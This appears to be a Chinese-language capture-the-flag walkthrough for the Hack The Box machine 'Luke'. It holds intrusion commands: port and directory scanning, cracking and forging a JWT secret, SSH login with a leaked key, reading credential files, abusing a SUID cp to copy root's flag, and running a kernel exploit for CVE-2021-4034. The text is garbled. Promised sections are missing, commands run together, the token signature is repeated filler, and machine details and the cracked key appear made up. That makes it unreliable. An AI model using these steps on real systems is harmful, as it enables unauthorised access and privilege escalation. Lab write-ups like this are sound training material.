# 如何進行HTB-Luke實戰
## 目錄
1. [HTB平臺簡介](#htb平臺簡介)
2. [Luke靶機概述](#luke靶機概述)
3. [環境準備](#環境準備)
4. [信息收集階段](#信息收集階段)
- [4.1 端口掃描](#41-端口掃描)
- [4.2 服務枚舉](#42-服務枚舉)
5. [漏洞利用](#漏洞利用)
- [5.1 Web應用分析](#51-web應用分析)
- [5.2 初始訪問獲取](#52-初始訪問獲取)
6. [權限提升](#權限提升)
- [6.1 橫向移動](#61-橫向移動)
- [6.2 提權到root](#62-提權到root)
7. [總結與防御建議](#總結與防御建議)
8. [附錄](#附錄)
---
## HTB平臺簡介
Hack The Box(HTB)是一個流行的網絡安全實戰平臺,提供數百個模擬真實環境的虛擬靶機。Luke是其中一臺中等難度的Linux靶機,涉及Web漏洞利用、密碼破解和權限提升等技術。
> 關鍵數據:截至2023年,HTB平臺注冊用戶超過150萬,Luke靶機平均完成率約35%
---
## Luke靶機概述
- **操作系統**:Ubuntu Linux
- **難度評級**:Medium
- **涉及技術**:
- HTTP服務枚舉
- JWT令牌偽造
- 密碼爆破
- SUID權限濫用
- 內核漏洞利用(CVE-2021-4034)
---
## 環境準備
### 必要工具
```bash
# 基礎工具
sudo apt install nmap gobuster hashcat john
# 專用工具
git clone https://github.com/ticarpi/jwt_tool
pip3 install pyjwt
.ovpn配置文件sudo openvpn your_profile.ovpn
使用Nmap進行全端口掃描:
nmap -sV -p- 10.10.10.xxx -T4 -oA luke_scan
典型結果:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1
80/tcp open http Apache httpd 2.4.29
5000/tcp open http Node.js Express framework
使用Gobuster進行目錄爆破:
gobuster dir -u http://10.10.10.xxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
發現關鍵路徑:
- /admin (302重定向)
- /login (登錄頁面)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJpYXQiOjE2MTUxMjM4NTN9.7JWI8kXQ4YjX3Y7zvZq7Q4YjX3Y7zvZq7Q4YjX3Y7zvZq7Q
python3 jwt_tool.py -t <JWT_TOKEN> -C -d /usr/share/wordlists/rockyou.txt
成功獲取密鑰:supersecret
import jwt
token = jwt.encode({"username":"admin"}, "supersecret", algorithm="HS256")
print(token)
/admin獲取SSH私鑰:-----BEGIN RSA PRIVATE KEY-----
MIIEpBAAKCAQEA3XoZzJ7...(略)
chmod 600 id_rsa
ssh -i id_rsa webadmin@10.10.10.xxx
發現數據庫憑證:
cat /opt/webapp/.env
DB_USER=luke
DB_PASS=...(使用john破解)
find / -perm -4000 2>/dev/null
發現異常/usr/bin/cp
利用方式:
/usr/bin/cp /root/root.txt /tmp/
gcc poc.c -o exploit
chmod +x exploit
./exploit
弱JWT密鑰 → JWT偽造 → 信息泄露 → 權限濫用 → 內核提權
# 解碼JWT
echo $TOKEN | jq -R 'split(".") | .[0],.[1] | @base64d'
# 檢查SUID
find / -perm -4000 -ls 2>/dev/null
”`
